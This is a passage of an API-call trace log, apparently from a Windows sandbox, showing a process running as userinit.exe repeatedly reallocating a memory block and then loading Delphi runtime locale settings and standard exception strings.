[0157.752] GlobalLock (hMem=0x36000c) returned 0xac8058
[0157.753] GlobalHandle (pMem=0xac8058) returned 0x36000c
[0157.753] GlobalUnlock (hMem=0x36000c) returned 0
[0157.753] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7c000, uFlags=0x2) returned 0x36000c
[0157.753] GlobalLock (hMem=0x36000c) returned 0xac8058
[0157.754] GlobalHandle (pMem=0xac8058) returned 0x36000c
[0157.754] GlobalUnlock (hMem=0x36000c) returned 0
[0157.754] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7e000, uFlags=0x2) returned 0x36000c
[0157.769] GlobalLock (hMem=0x36000c) returned 0xb50048
[0157.769] GlobalHandle (pMem=0xb50048) returned 0x36000c
[0157.769] GlobalUnlock (hMem=0x36000c) returned 0
[0157.769] GlobalReAlloc (hMem=0x36000c, dwBytes=0x80000, uFlags=0x2) returned 0x36000c
[0157.785] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.786] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.786] GlobalUnlock (hMem=0x36000c) returned 0
[0157.786] GlobalReAlloc (hMem=0x36000c, dwBytes=0x82000, uFlags=0x2) returned 0x36000c
[0157.795] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.796] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.796] GlobalUnlock (hMem=0x36000c) returned 0
[0157.796] GlobalReAlloc (hMem=0x36000c, dwBytes=0x84000, uFlags=0x2) returned 0x36000c
[0157.806] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.807] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.807] GlobalUnlock (hMem=0x36000c) returned 0
[0157.807] GlobalReAlloc (hMem=0x36000c, dwBytes=0x86000, uFlags=0x2) returned 0x36000c
[0157.817] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.818] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.818] GlobalUnlock (hMem=0x36000c) returned 0
[0157.818] GlobalReAlloc (hMem=0x36000c, dwBytes=0x88000, uFlags=0x2) returned 0x36000c
[0157.828] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.829] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.829] GlobalUnlock (hMem=0x36000c) returned 0
[0157.829] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8a000, uFlags=0x2) returned 0x36000c
[0157.839] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.840] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.840] GlobalUnlock (hMem=0x36000c) returned 0
[0157.840] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8c000, uFlags=0x2) returned 0x36000c
[0157.897] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.897] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.897] GlobalUnlock (hMem=0x36000c) returned 0
[0157.898] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8e000, uFlags=0x2) returned 0x36000c
[0157.907] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.908] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.908] GlobalUnlock (hMem=0x36000c) returned 0
[0157.908] GlobalReAlloc (hMem=0x36000c, dwBytes=0x90000, uFlags=0x2) returned 0x36000c
[0157.918] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.919] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.919] GlobalUnlock (hMem=0x36000c) returned 0
[0157.919] GlobalReAlloc (hMem=0x36000c, dwBytes=0x92000, uFlags=0x2) returned 0x36000c
[0157.929] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.930] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.930] GlobalUnlock (hMem=0x36000c) returned 0
[0157.930] GlobalReAlloc (hMem=0x36000c, dwBytes=0x94000, uFlags=0x2) returned 0x36000c
[0157.940] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.941] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.941] GlobalUnlock (hMem=0x36000c) returned 0
[0157.941] GlobalReAlloc (hMem=0x36000c, dwBytes=0x96000, uFlags=0x2) returned 0x36000c
[0157.955] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.955] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.956] GlobalUnlock (hMem=0x36000c) returned 0
[0157.956] GlobalReAlloc (hMem=0x36000c, dwBytes=0x98000, uFlags=0x2) returned 0x36000c
[0157.966] GlobalLock (hMem=0x36000c) returned 0x570020
[0157.967] GlobalHandle (pMem=0x570020) returned 0x36000c
[0157.967] GlobalUnlock (hMem=0x36000c) returned 0
[0157.967] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9a000, uFlags=0x2) returned 0x36000c
[0157.978] GlobalLock (hMem=0x36000c) returned 0x810020
[0157.979] GlobalHandle (pMem=0x810020) returned 0x36000c
[0157.979] GlobalUnlock (hMem=0x36000c) returned 0
[0157.979] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9c000, uFlags=0x2) returned 0x36000c
[0158.059] GlobalLock (hMem=0x36000c) returned 0x570020
[0158.060] GlobalHandle (pMem=0x570020) returned 0x36000c
[0158.060] GlobalUnlock (hMem=0x36000c) returned 0
[0158.060] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9e000, uFlags=0x2) returned 0x36000c
[0158.072] GlobalLock (hMem=0x36000c) returned 0x810020
[0158.072] GlobalHandle (pMem=0x810020) returned 0x36000c
[0158.072] GlobalUnlock (hMem=0x36000c) returned 0
[0158.072] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa0000, uFlags=0x2) returned 0x36000c
[0158.085] GlobalLock (hMem=0x36000c) returned 0x570020
[0158.086] GlobalHandle (pMem=0x570020) returned 0x36000c
[0158.086] GlobalUnlock (hMem=0x36000c) returned 0
[0158.086] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa2000, uFlags=0x2) returned 0x36000c
[0158.098] GlobalLock (hMem=0x36000c) returned 0x810020
[0158.100] GlobalHandle (pMem=0x810020) returned 0x36000c
[0158.100] GlobalUnlock (hMem=0x36000c) returned 0
[0158.100] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa4000, uFlags=0x2) returned 0x36000c
[0158.111] GlobalLock (hMem=0x36000c) returned 0x570020
[0158.112] GlobalHandle (pMem=0x570020) returned 0x36000c
[0158.112] GlobalUnlock (hMem=0x36000c) returned 0
[0158.112] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa6000, uFlags=0x2) returned 0x36000c
[0158.124] GlobalLock (hMem=0x36000c) returned 0x810020
[0158.125] GlobalHandle (pMem=0x810020) returned 0x36000c
[0158.125] GlobalUnlock (hMem=0x36000c) returned 0
[0158.125] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa8000, uFlags=0x2) returned 0x36000c
[0158.137] GlobalLock (hMem=0x36000c) returned 0x570020
[0158.138] GlobalHandle (pMem=0x570020) returned 0x36000c
[0158.138] GlobalUnlock (hMem=0x36000c) returned 0
[0158.138] GlobalReAlloc (hMem=0x36000c, dwBytes=0xaa000, uFlags=0x2) returned 0x36000c
[0158.179] GlobalLock (hMem=0x36000c) returned 0x810020
[0158.180] GlobalHandle (pMem=0x810020) returned 0x36000c
[0158.180] GlobalUnlock (hMem=0x36000c) returned 0
[0158.180] GlobalReAlloc (hMem=0x36000c, dwBytes=0xac000, uFlags=0x2) returned 0x36000c
[0158.194] GlobalLock (hMem=0x36000c) returned 0x570020
[0158.195] GlobalHandle (pMem=0x570020) returned 0x36000c
[0158.195] GlobalUnlock (hMem=0x36000c) returned 0
[0158.195] GlobalReAlloc (hMem=0x36000c, dwBytes=0xae000, uFlags=0x2) returned 0x36000c
[0158.208] GlobalLock (hMem=0x36000c) returned 0x810020
[0158.243] GlobalHandle (pMem=0x810020) returned 0x36000c
[0158.243] GlobalUnlock (hMem=0x36000c) returned 0
[0158.243] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb0000, uFlags=0x2) returned 0x36000c
[0158.255] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.256] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.256] GlobalUnlock (hMem=0x36000c) returned 0
[0158.256] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb2000, uFlags=0x2) returned 0x36000c
[0158.268] GlobalLock (hMem=0x36000c) returned 0x2780020
[0158.269] GlobalHandle (pMem=0x2780020) returned 0x36000c
[0158.269] GlobalUnlock (hMem=0x36000c) returned 0
[0158.269] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb4000, uFlags=0x2) returned 0x36000c
[0158.281] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.282] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.282] GlobalUnlock (hMem=0x36000c) returned 0
[0158.282] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb6000, uFlags=0x2) returned 0x36000c
[0158.342] GlobalLock (hMem=0x36000c) returned 0x2780020
[0158.343] GlobalHandle (pMem=0x2780020) returned 0x36000c
[0158.343] GlobalUnlock (hMem=0x36000c) returned 0
[0158.343] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb8000, uFlags=0x2) returned 0x36000c
[0158.356] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.356] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.357] GlobalUnlock (hMem=0x36000c) returned 0
[0158.357] GlobalReAlloc (hMem=0x36000c, dwBytes=0xba000, uFlags=0x2) returned 0x36000c
[0158.369] GlobalLock (hMem=0x36000c) returned 0x2780020
[0158.370] GlobalHandle (pMem=0x2780020) returned 0x36000c
[0158.370] GlobalUnlock (hMem=0x36000c) returned 0
[0158.370] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbc000, uFlags=0x2) returned 0x36000c
[0158.432] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.432] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.432] GlobalUnlock (hMem=0x36000c) returned 0
[0158.432] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbe000, uFlags=0x2) returned 0x36000c
[0158.446] GlobalLock (hMem=0x36000c) returned 0x2780020
[0158.447] GlobalHandle (pMem=0x2780020) returned 0x36000c
[0158.447] GlobalUnlock (hMem=0x36000c) returned 0
[0158.447] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc0000, uFlags=0x2) returned 0x36000c
[0158.462] GlobalLock (hMem=0x36000c) returned 0x2840020
[0158.462] GlobalHandle (pMem=0x2840020) returned 0x36000c
[0158.462] GlobalUnlock (hMem=0x36000c) returned 0
[0158.462] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc2000, uFlags=0x2) returned 0x36000c
[0158.522] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.523] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.523] GlobalUnlock (hMem=0x36000c) returned 0
[0158.523] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc4000, uFlags=0x2) returned 0x36000c
[0158.537] GlobalLock (hMem=0x36000c) returned 0x2790020
[0158.538] GlobalHandle (pMem=0x2790020) returned 0x36000c
[0158.538] GlobalUnlock (hMem=0x36000c) returned 0
[0158.538] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc6000, uFlags=0x2) returned 0x36000c
[0158.553] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.554] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.554] GlobalUnlock (hMem=0x36000c) returned 0
[0158.554] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc8000, uFlags=0x2) returned 0x36000c
[0158.615] GlobalLock (hMem=0x36000c) returned 0x2790020
[0158.615] GlobalHandle (pMem=0x2790020) returned 0x36000c
[0158.615] GlobalUnlock (hMem=0x36000c) returned 0
[0158.615] GlobalReAlloc (hMem=0x36000c, dwBytes=0xca000, uFlags=0x2) returned 0x36000c
[0158.630] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.631] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.631] GlobalUnlock (hMem=0x36000c) returned 0
[0158.631] GlobalReAlloc (hMem=0x36000c, dwBytes=0xcc000, uFlags=0x2) returned 0x36000c
[0158.645] GlobalLock (hMem=0x36000c) returned 0x2790020
[0158.646] GlobalHandle (pMem=0x2790020) returned 0x36000c
[0158.646] GlobalUnlock (hMem=0x36000c) returned 0
[0158.646] GlobalReAlloc (hMem=0x36000c, dwBytes=0xce000, uFlags=0x2) returned 0x36000c
[0158.659] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.660] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.660] GlobalUnlock (hMem=0x36000c) returned 0
[0158.660] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd0000, uFlags=0x2) returned 0x36000c
[0158.722] GlobalLock (hMem=0x36000c) returned 0x2790020
[0158.723] GlobalHandle (pMem=0x2790020) returned 0x36000c
[0158.723] GlobalUnlock (hMem=0x36000c) returned 0
[0158.723] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd2000, uFlags=0x2) returned 0x36000c
[0158.738] GlobalLock (hMem=0x36000c) returned 0x2870020
[0158.739] GlobalHandle (pMem=0x2870020) returned 0x36000c
[0158.739] GlobalUnlock (hMem=0x36000c) returned 0
[0158.739] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd4000, uFlags=0x2) returned 0x36000c
[0158.754] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.802] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.802] GlobalUnlock (hMem=0x36000c) returned 0
[0158.802] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd6000, uFlags=0x2) returned 0x36000c
[0158.817] GlobalLock (hMem=0x36000c) returned 0x27a0020
[0158.818] GlobalHandle (pMem=0x27a0020) returned 0x36000c
[0158.818] GlobalUnlock (hMem=0x36000c) returned 0
[0158.818] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd8000, uFlags=0x2) returned 0x36000c
[0158.833] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.834] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.834] GlobalUnlock (hMem=0x36000c) returned 0
[0158.834] GlobalReAlloc (hMem=0x36000c, dwBytes=0xda000, uFlags=0x2) returned 0x36000c
[0158.848] GlobalLock (hMem=0x36000c) returned 0x27a0020
[0158.912] GlobalHandle (pMem=0x27a0020) returned 0x36000c
[0158.912] GlobalUnlock (hMem=0x36000c) returned 0
[0158.912] GlobalReAlloc (hMem=0x36000c, dwBytes=0xdc000, uFlags=0x2) returned 0x36000c
[0158.930] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0158.931] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0158.931] GlobalUnlock (hMem=0x36000c) returned 0
[0158.931] GlobalReAlloc (hMem=0x36000c, dwBytes=0xde000, uFlags=0x2) returned 0x36000c
[0158.948] GlobalLock (hMem=0x36000c) returned 0x27a0020
[0158.949] GlobalHandle (pMem=0x27a0020) returned 0x36000c
[0158.949] GlobalUnlock (hMem=0x36000c) returned 0
[0158.949] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe0000, uFlags=0x2) returned 0x36000c
[0159.011] GlobalLock (hMem=0x36000c) returned 0x2880020
[0159.012] GlobalHandle (pMem=0x2880020) returned 0x36000c
[0159.012] GlobalUnlock (hMem=0x36000c) returned 0
[0159.012] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe2000, uFlags=0x2) returned 0x36000c
[0159.028] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.029] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.029] GlobalUnlock (hMem=0x36000c) returned 0
[0159.029] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe4000, uFlags=0x2) returned 0x36000c
[0159.044] GlobalLock (hMem=0x36000c) returned 0x27b0020
[0159.045] GlobalHandle (pMem=0x27b0020) returned 0x36000c
[0159.045] GlobalUnlock (hMem=0x36000c) returned 0
[0159.045] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe6000, uFlags=0x2) returned 0x36000c
[0159.109] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.110] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.110] GlobalUnlock (hMem=0x36000c) returned 0
[0159.110] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe8000, uFlags=0x2) returned 0x36000c
[0159.126] GlobalLock (hMem=0x36000c) returned 0x27b0020
[0159.127] GlobalHandle (pMem=0x27b0020) returned 0x36000c
[0159.127] GlobalUnlock (hMem=0x36000c) returned 0
[0159.127] GlobalReAlloc (hMem=0x36000c, dwBytes=0xea000, uFlags=0x2) returned 0x36000c
[0159.191] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.192] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.192] GlobalUnlock (hMem=0x36000c) returned 0
[0159.192] GlobalReAlloc (hMem=0x36000c, dwBytes=0xec000, uFlags=0x2) returned 0x36000c
[0159.209] GlobalLock (hMem=0x36000c) returned 0x27b0020
[0159.210] GlobalHandle (pMem=0x27b0020) returned 0x36000c
[0159.210] GlobalUnlock (hMem=0x36000c) returned 0
[0159.210] GlobalReAlloc (hMem=0x36000c, dwBytes=0xee000, uFlags=0x2) returned 0x36000c
[0159.227] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.228] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.228] GlobalUnlock (hMem=0x36000c) returned 0
[0159.228] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf0000, uFlags=0x2) returned 0x36000c
[0159.292] GlobalLock (hMem=0x36000c) returned 0x27b0020
[0159.293] GlobalHandle (pMem=0x27b0020) returned 0x36000c
[0159.293] GlobalUnlock (hMem=0x36000c) returned 0
[0159.293] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf2000, uFlags=0x2) returned 0x36000c
[0159.311] GlobalLock (hMem=0x36000c) returned 0x28b0020
[0159.311] GlobalHandle (pMem=0x28b0020) returned 0x36000c
[0159.311] GlobalUnlock (hMem=0x36000c) returned 0
[0159.311] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf4000, uFlags=0x2) returned 0x36000c
[0159.328] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.328] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.329] GlobalUnlock (hMem=0x36000c) returned 0
[0159.329] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf6000, uFlags=0x2) returned 0x36000c
[0159.392] GlobalLock (hMem=0x36000c) returned 0x27c0020
[0159.392] GlobalHandle (pMem=0x27c0020) returned 0x36000c
[0159.392] GlobalUnlock (hMem=0x36000c) returned 0
[0159.392] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf8000, uFlags=0x2) returned 0x36000c
[0159.408] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.409] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.409] GlobalUnlock (hMem=0x36000c) returned 0
[0159.409] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfa000, uFlags=0x2) returned 0x36000c
[0159.473] GlobalLock (hMem=0x36000c) returned 0x27c0020
[0159.474] GlobalHandle (pMem=0x27c0020) returned 0x36000c
[0159.474] GlobalUnlock (hMem=0x36000c) returned 0
[0159.474] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfc000, uFlags=0x2) returned 0x36000c
[0159.491] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.492] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.492] GlobalUnlock (hMem=0x36000c) returned 0
[0159.492] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfe000, uFlags=0x2) returned 0x36000c
[0159.511] GlobalLock (hMem=0x36000c) returned 0x27c0020
[0159.511] GlobalHandle (pMem=0x27c0020) returned 0x36000c
[0159.511] GlobalUnlock (hMem=0x36000c) returned 0
[0159.511] GlobalReAlloc (hMem=0x36000c, dwBytes=0x100000, uFlags=0x2) returned 0x36000c
[0159.575] GlobalLock (hMem=0x36000c) returned 0x28c0020
[0159.576] GlobalHandle (pMem=0x28c0020) returned 0x36000c
[0159.576] GlobalUnlock (hMem=0x36000c) returned 0
[0159.576] GlobalReAlloc (hMem=0x36000c, dwBytes=0x102000, uFlags=0x2) returned 0x36000c
[0159.594] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.594] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.594] GlobalUnlock (hMem=0x36000c) returned 0
[0159.594] GlobalReAlloc (hMem=0x36000c, dwBytes=0x104000, uFlags=0x2) returned 0x36000c
[0159.659] GlobalLock (hMem=0x36000c) returned 0x27d0020
[0159.660] GlobalHandle (pMem=0x27d0020) returned 0x36000c
[0159.660] GlobalUnlock (hMem=0x36000c) returned 0
[0159.660] GlobalReAlloc (hMem=0x36000c, dwBytes=0x106000, uFlags=0x2) returned 0x36000c
[0159.679] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.680] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.680] GlobalUnlock (hMem=0x36000c) returned 0
[0159.680] GlobalReAlloc (hMem=0x36000c, dwBytes=0x108000, uFlags=0x2) returned 0x36000c
[0159.697] GlobalLock (hMem=0x36000c) returned 0x27d0020
[0159.698] GlobalHandle (pMem=0x27d0020) returned 0x36000c
[0159.698] GlobalUnlock (hMem=0x36000c) returned 0
[0159.698] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10a000, uFlags=0x2) returned 0x36000c
[0159.762] GlobalLock (hMem=0x36000c) returned 0x26c0020
[0159.763] GlobalHandle (pMem=0x26c0020) returned 0x36000c
[0159.763] GlobalUnlock (hMem=0x36000c) returned 0
[0159.763] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10c000, uFlags=0x2) returned 0x36000c
[0159.781] GlobalLock (hMem=0x36000c) returned 0x27d0020
[0159.782] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x26c0000
[0159.782] VirtualAlloc (lpAddress=0x26c0000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x26c0000
[0159.861] GetKeyboardType (nTypeFlag=0) returned 4
[0159.861] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0159.861] GetStartupInfoA (in: lpStartupInfo=0x24f320 | out: lpStartupInfo=0x24f320*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0159.861] GetVersion () returned 0x1db10106
[0159.861] GetVersion () returned 0x1db10106
[0159.861] GetCurrentThreadId () returned 0x6e4
[0159.861] GetModuleFileNameA (in: hModule=0x28e0000, lpFilename=0x24ee1c, nSize=0x105 | out: lpFilename=",î$" (normalized: "c:\\windows\\system32\\,î$")) returned 0x0
[0159.861] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24ecf7, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0159.861] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24ee0c | out: phkResult=0x24ee0c*=0x0) returned 0x2
[0159.861] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24ee0c | out: phkResult=0x24ee0c*=0x0) returned 0x2
[0159.862] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24ee0c | out: phkResult=0x24ee0c*=0x0) returned 0x2
[0159.862] lstrcpynA (in: lpString1=0x24ecf7, lpString2=",î$", iMaxLength=261 | out: lpString1=",î$") returned=",î$"
[0159.862] GetThreadLocale () returned 0x409
[0159.862] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x24ee07, cchData=5 | out: lpLCData="ENU") returned 4
[0159.862] lstrlenA (lpString=",î$") returned 3
[0159.862] LoadStringA (in: hInstance=0x28e0000, uID=0xffc4, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0159.862] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x64dcc0
[0159.862] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a00000
[0159.862] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x64ecc0
[0159.862] VirtualAlloc (lpAddress=0x2a00000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a00000
[0159.862] LoadStringA (in: hInstance=0x28e0000, uID=0xffc3, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0159.862] LoadStringA (in: hInstance=0x28e0000, uID=0xffc1, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0159.862] LoadStringA (in: hInstance=0x28e0000, uID=0xffc2, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffd4, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffdd, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffd3, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffd0, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffd7, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffd6, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe8, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe9, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffea, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe7, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe5, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe3, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe2, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe1, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffe0, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xffff, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfffe, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfffd, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfffc, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfffb, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfffa, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfff9, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfff8, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0159.863] LoadStringA (in: hInstance=0x28e0000, uID=0xfff7, lpBuffer=0x24ef40, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
